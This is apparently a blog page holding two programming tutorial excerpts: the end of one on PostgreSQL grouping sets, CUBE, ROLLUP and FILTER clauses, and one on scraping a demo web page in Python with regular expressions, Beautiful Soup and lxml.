The CUBE keyword is what you might have been looking for: test=# SELECT region, country, avg(production) FROM t_oil WHERE country IN ('USA', 'Canada', 'Iran', 'Oman') GROUP BY CUBE (region, country); region | country | avg ---------------+---------+----------------------- Middle East | Iran | 3631.6956521739130435 Middle East | Oman | 586.4545454545454545 Middle East | | 2142.9111111111111111 North America | Canada | 2123.2173913043478261 North America | USA | 9141.3478260869565217 North America | | 5632.2826086956521739 | | 3906.7692307692307692 | Canada | 2123.2173913043478261 | Iran | 3631.6956521739130435 | Oman | 586.4545454545454545 | USA | 9141.3478260869565217 (11 rows) Note that even more rows have been added to the result. The CUBE keyword will create the same data as: GROUP BY region, country + GROUP BY region + GROUP BY country + the overall average. So the whole idea is to extract many results and various levels of aggregation at once. The resulting cube contains all possible combinations of groups. ROLLUP and CUBE are really just convenience features on top of GROUPING SETS. With the GROUPING SETS clause you can explicitly list the aggregates you want: test=# SELECT region, country, avg(production) FROM t_oil WHERE country IN ('USA', 'Canada', 'Iran', 'Oman') GROUP BY GROUPING SETS ( (), region, country); region | country | avg ---------------+---------+----------------------- Middle East | | 2142.9111111111111111 North America | | 5632.2826086956521739 | | 3906.7692307692307692 | Canada | 2123.2173913043478261 | Iran | 3631.6956521739130435 | Oman | 586.4545454545454545 | USA | 9141.3478260869565217 (7 rows) In this example, I went for three grouping sets: the overall average, GROUP BY region, and GROUP BY country. In case you want region and country combined, use (region, country).

Investigating performance

Grouping sets are a powerful feature, which helps reduce the number of expensive queries.
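One practical wrinkle when filtering out the injected NULL values: a NULL produced by ROLLUP or CUBE is indistinguishable from a NULL stored in the underlying data. The standard GROUPING() function, supported by PostgreSQL 9.5 and later, resolves the ambiguity. A sketch against the t_oil table above (not from the original article):

```sql
-- GROUPING(col) returns 1 when the NULL in col was injected by the
-- rollup (that is, the row is a summary row) and 0 when the value
-- comes from the underlying data.
SELECT region,
       country,
       GROUPING(region)  AS region_is_total,
       GROUPING(country) AS country_is_total,
       avg(production)
FROM t_oil
WHERE country IN ('USA', 'Canada', 'Iran', 'Oman')
GROUP BY ROLLUP (region, country);
```

A GUI can then drill into the result set by checking the GROUPING() flags instead of testing columns for NULL.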
Internally, PostgreSQL will basically turn to traditional GroupAggregates to make things work. A GroupAggregate node requires sorted data, so be prepared that PostgreSQL might do a lot of temporary sorting: test=# explain SELECT region, country, avg(production) FROM t_oil WHERE country IN ('USA', 'Canada', 'Iran', 'Oman') GROUP BY GROUPING SETS ( (), region, country); QUERY PLAN --------------------------------------------------------------- GroupAggregate (cost=22.58..32.69 rows=34 width=52) Group Key: region Group Key: () Sort Key: country Group Key: country -> Sort (cost=22.58..23.04 rows=184 width=24) Sort Key: region -> Seq Scan on t_oil (cost=0.00..15.66 rows=184 width=24) Filter: (country = ANY ('{USA,Canada,Iran,Oman}'::text[])) (9 rows) Hash aggregates are only supported for normal GROUP BY clauses involving no grouping sets. According to the developer of grouping sets (Atri Sharma), adding support for hashes is not worth the effort, so it seems PostgreSQL already has an efficient implementation, even if the optimizer has fewer choices than it has with normal GROUP BY statements.

Combining grouping sets with the FILTER clause

In real-world applications grouping sets can often be combined with so-called FILTER clauses. The idea behind FILTER is to be able to run partial aggregates. Here is an example: test=# SELECT region, avg(production) AS all, avg(production) FILTER (WHERE year < 1990) AS old, avg(production) FILTER (WHERE year >= 1990) AS new FROM t_oil GROUP BY ROLLUP (region); region | all | old | new ---------------+----------------+----------------+---------------- Middle East | 1992.603686635 | 1747.325892857 | 2254.233333333 North America | 4541.362318840 | 4471.653333333 | 4624.349206349 | 2607.513986013 | 2430.685618729 | 2801.183150183 (3 rows) The idea here is that not all columns will use the same data for aggregation. The FILTER clauses allow you to selectively pass data to those aggregates.
In my example, the second aggregate will only consider data before 1990, while the third aggregate will take care of more recent data. If it is possible to move a condition to a WHERE clause, that is always more desirable, as less data has to be fetched from the table. FILTER is only useful if the data left by the WHERE clause is not needed by every aggregate. FILTER works for all kinds of aggregates and offers a simple way to pivot your data.

Summary

We have learned about advanced features provided by SQL. On top of simple aggregates, PostgreSQL provides grouping sets to create custom aggregations. Resources for Article: Further resources on this subject: PostgreSQL in Action [article] PostgreSQL as an Extensible RDBMS [article] Recovery in PostgreSQL 9 [article]

article-image-scraping-web-page
Packt
20 Jun 2017
11 min read
Save for later

Scraping a Web Page

In this article by Katharine Jarmul, the author of the book Python Web Scraping - Second Edition, we look at an example: suppose I have a shop selling shoes and want to keep track of my competitor's prices. I could go to my competitor's website each day and compare each shoe's price with my own; however, this will take a lot of time and will not scale well if I sell thousands of shoes or need to check price changes frequently. Or maybe I just want to buy a shoe when it's on sale. I could come back and check the shoe website each day until I get lucky, but the shoe I want might not be on sale for months. These repetitive manual processes could instead be replaced with an automated solution using the web scraping techniques covered in this book. In an ideal world, web scraping wouldn't be necessary and each website would provide an API to share its data in a structured format. Indeed, some websites do provide APIs, but they typically restrict the data that is available and how frequently it can be accessed. Additionally, a website developer might change, remove or restrict the backend API. In short, we cannot rely on APIs to access the online data we may want, and therefore we need to learn about web scraping techniques. (For more resources related to this topic, see here.)

Three approaches to scrape a web page

Now that we understand the structure of this web page, we will investigate three different approaches to scraping its data: first with regular expressions, then with the popular Beautiful Soup module, and finally with the powerful lxml module.

Regular expressions

If you are unfamiliar with regular expressions or need a reminder, there is a thorough overview available at https://docs.python.org/3/howto/regex.html. Even if you use regular expressions (or regex) with another programming language, I recommend stepping through it for a refresher on regex with Python.
To scrape the country area using regular expressions, we will first try matching the contents of the <td> element, as follows: >>> import re >>> from advanced_link_crawler import download >>> url = 'http://example.webscraping.com/view/UnitedKingdom-239' >>> html = download(url) >>> re.findall(r'<td class="w2p_fw">(.*?)</td>', html) ['<img src="/places/static/images/flags/gb.png" />', '244,820 square kilometres', '62,348,447', 'GB', 'United Kingdom', 'London', 'EU', '.uk', 'GBP', 'Pound', '44', '@# #@@|@## #@@|@@# #@@|@@## #@@|@#@ #@@|@@#@ #@@|GIR0AA', '^(([A-Z]\d{2}[A-Z]{2})|([A-Z]\d{3}[A-Z]{2})|([A-Z]{2}\d{2} [A-Z]{2})|([A-Z]{2}\d{3}[A-Z]{2})|([A-Z]\d[A-Z]\d[A-Z]{2}) |([A-Z]{2}\d[A-Z]\d[A-Z]{2})|(GIR0AA))$', 'en-GB,cy-GB,gd', 'IE '] This result shows that the <td class="w2p_fw"> tag is used for multiple country attributes. If we simply wanted to scrape the country area, we can select the second matching element, as follows: >>> re.findall('<td class="w2p_fw">(.*?)</td>', html)[1] '244,820 square kilometres' This solution works but could easily fail if the web page is updated. Consider if this table is changed and the area is no longer in the second matching element. If we just need to scrape the data now, future changes can be ignored. However, if we want to rescrape this data at some point, we want our solution to be as robust against layout changes as possible. To make this regular expression more specific, we can include the parent <tr> element, which has an ID, so it ought to be unique: >>> re.findall('<tr id="places_area__row"><td class="w2p_label">Area: </td><td class="w2p_fw">(.*?)</td>', html) ['244,820 square kilometres'] This iteration is better; however, there are many other ways the web page could be updated in a way that still breaks the regular expression. For example, double quotation marks might be changed to single, extra spaces could be added between the tags, or the area_label could be changed. Here is an improved version to try and support these various possibilities: >>> re.findall('''<tr id="places_area__row">.*?<td\s*class=["']w2p_fw["']>(.*?)</td>''', html) ['244,820 square kilometres'] This regular expression is more future-proof but is difficult to construct, and quite unreadable. Also, there are still plenty of other minor layout changes that would break it, such as if a title attribute was added to the <td> tag or if the tr or td elements changed their CSS classes or IDs. From this example, it is clear that regular expressions provide a quick way to scrape data but are too brittle and easily break when a web page is updated. Fortunately, there are better data extraction solutions, such as the parsing libraries covered next.

Beautiful Soup

Beautiful Soup is a popular library that parses a web page and provides a convenient interface to navigate content. If you do not already have this module, the latest version can be installed using this command: pip install beautifulsoup4 The first step with Beautiful Soup is to parse the downloaded HTML into a soup document. Many web pages do not contain perfectly valid HTML and Beautiful Soup needs to correct improper open and close tags. For example, consider this simple web page containing a list with missing attribute quotes and closing tags: <ul class=country> <li>Area <li>Population </ul> If the Population item is interpreted as a child of the Area item instead of the list, we could get unexpected results when scraping. Let us see how Beautiful Soup handles this: >>> from bs4 import BeautifulSoup >>> broken_html = '<ul class=country><li>Area<li>Population</ul>' >>> # parse the HTML >>> soup = BeautifulSoup(broken_html, 'html.parser') >>> fixed_html = soup.prettify() >>> print(fixed_html) <ul class="country"> <li> Area <li> Population </li> </li> </ul> We can see that using the default html.parser did not result in properly parsed HTML. We can see from the previous snippet that it has used nested li elements, which might make it difficult to navigate. Luckily there are more options for parsers. We can install lxml or we can also use html5lib.
To install html5lib, simply use pip: pip install html5lib Now, we can repeat this code, changing only the parser like so: >>> soup = BeautifulSoup(broken_html, 'html5lib') >>> fixed_html = soup.prettify() >>> print(fixed_html) <html> <head> </head> <body> <ul class="country"> <li> Area </li> <li> Population </li> </ul> </body> </html>  Here, BeautifulSoup using html5lib was able to correctly interpret the missing attribute quotes and closing tags, as well as add the <html> and <body> tags to form a complete HTML document. You should see similar results if you used lxml. Now, we can navigate to the elements we want using the find() and find_all() methods: >>> ul = soup.find('ul', attrs={'class':'country'}) >>> ul.find('li') # returns just the first match <li>Area</li> >>> ul.find_all('li') # returns all matches [<li>Area</li>, <li>Population</li>] For a full list of available methods and parameters, the official documentation is available at http://www.crummy.com/software/BeautifulSoup/bs4/doc/. Now, using these techniques, here is a full example to extract the country area from our example website: >>> from bs4 import BeautifulSoup >>> url = 'http://example.webscraping.com/places/view/United-Kingdom-239' >>> html = download(url) >>> soup = BeautifulSoup(html) >>> # locate the area row >>> tr = soup.find(attrs={'id':'places_area__row'}) >>> td = tr.find(attrs={'class':'w2p_fw'}) # locate the data element >>> area = td.text # extract the text from the data element >>> print(area) 244,820 square kilometres This code is more verbose than regular expressions but easier to construct and understand. Also, we no longer need to worry about problems in minor layout changes, such as extra whitespace or tag attributes. We also know if the page contains broken HTML that BeautifulSoup can help clean the page and allow us to extract data from very broken website code. 
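The robustness that a real parser buys over regular expressions is available even from the standard library alone. As a sketch (not from the book), the quote-style variations that broke the regular expressions earlier are handled transparently by html.parser:

```python
from html.parser import HTMLParser

class AreaExtractor(HTMLParser):
    """Collect the text of the td.w2p_fw cell inside tr#places_area__row."""
    def __init__(self):
        super().__init__()
        self.in_row = False
        self.in_cell = False
        self.area = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == 'tr' and attrs.get('id') == 'places_area__row':
            self.in_row = True
        elif self.in_row and tag == 'td' and attrs.get('class') == 'w2p_fw':
            self.in_cell = True

    def handle_data(self, data):
        if self.in_cell:
            self.area = data
            self.in_cell = False
            self.in_row = False

# Note the mixed quoting styles: the parser normalizes them, whereas the
# earlier regular expression needed ["'] alternations to cope.
html = ('<table><tr id="places_area__row">'
        '<td class="w2p_label">Area: </td>'
        "<td class='w2p_fw'>244,820 square kilometres</td>"
        '</tr></table>')

parser = AreaExtractor()
parser.feed(html)
print(parser.area)  # 244,820 square kilometres
```

Beautiful Soup and lxml provide the same tolerance with far less code, which is why the rest of this article relies on them rather than on hand-rolled parsers or regexes.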
Lxml

Lxml is a Python library built on top of the libxml2 XML parsing library, which is written in C. This helps make it faster than Beautiful Soup, but also harder to install on some computers, specifically Windows. The latest installation instructions are available at http://lxml.de/installation.html. If you run into difficulties installing the library on your own, you can also use Anaconda to do so: https://anaconda.org/anaconda/lxml.

If you are unfamiliar with Anaconda, it is a package and environment manager, primarily focused on open data science packages, built by the folks at Continuum Analytics. You can download and install Anaconda by following their setup instructions here: https://www.continuum.io/downloads. Note that using the Anaconda quick install will set your PYTHON_PATH to the Conda installation of Python.

As with Beautiful Soup, the first step when using lxml is parsing the potentially invalid HTML into a consistent format. Here is an example of parsing the same broken HTML:

>>> from lxml.html import fromstring, tostring
>>> broken_html = '<ul class=country><li>Area<li>Population</ul>'
>>> tree = fromstring(broken_html)  # parse the HTML
>>> fixed_html = tostring(tree, pretty_print=True)
>>> print(fixed_html)
<ul class="country">
<li>Area</li>
<li>Population</li>
</ul>

As with Beautiful Soup, lxml was able to correctly parse the missing attribute quotes and closing tags, although it did not add the <html> and <body> tags. These are not required by the XML standard, so it is unnecessary for lxml to insert them.

After parsing the input, lxml has a number of different options to select elements, such as XPath selectors and a find() method similar to Beautiful Soup's. Instead, we will use CSS selectors here, because they are more compact and can be reused later when parsing dynamic content. Some readers will already be familiar with them from their experience with jQuery selectors, or from their use in front-end web development.
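Before moving on to CSS selectors, here is a rough sketch of the XPath alternative mentioned above, which needs no extra dependency (the markup is a hypothetical stand-in for the example page's area row):

```python
from lxml.html import fromstring

# Hypothetical stand-in for the example page's area row
html = ('<table><tr id="places_area__row">'
        '<td class="w2p_fw">244,820 square kilometres</td></tr></table>')
tree = fromstring(html)
# XPath query: any tr with the given id, then its td child with the given class
area = tree.xpath('//tr[@id="places_area__row"]/td[@class="w2p_fw"]/text()')[0]
print(area)
```

XPath is more verbose than the equivalent CSS selector, but it can express queries that CSS cannot, such as selecting by text content.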
We will also compare the performance of these selectors with XPath. To use CSS selectors, you might need to install the cssselect library, like so:

pip install cssselect

Now we can use the lxml CSS selectors to extract the area data from the example page:

>>> tree = fromstring(html)
>>> td = tree.cssselect('tr#places_area__row > td.w2p_fw')[0]
>>> area = td.text_content()
>>> print(area)
244,820 square kilometres

By using the cssselect method on our tree, we can utilize CSS syntax to select the table row element with the places_area__row ID, and then its child table data tag with the w2p_fw class. Since cssselect returns a list, we index the first result and call the text_content method, which iterates over all child elements and returns the concatenated text of each one. In this case, we only have one element, but this functionality is useful to know for more complex extraction examples.

Summary

We have walked through a variety of ways to scrape data from a web page. Regular expressions can be useful for a one-off scrape or to avoid the overhead of parsing the entire web page, and Beautiful Soup provides a high-level interface while avoiding any difficult dependencies. However, in general, lxml will be the best choice because of its speed and extensive functionality, so we will use it in future examples.

Resources for Article:

Further resources on this subject:

Web scraping with Python (Part 2) [article]
Scraping the Web with Python - Quick Start [article]
Scraping the Data [article]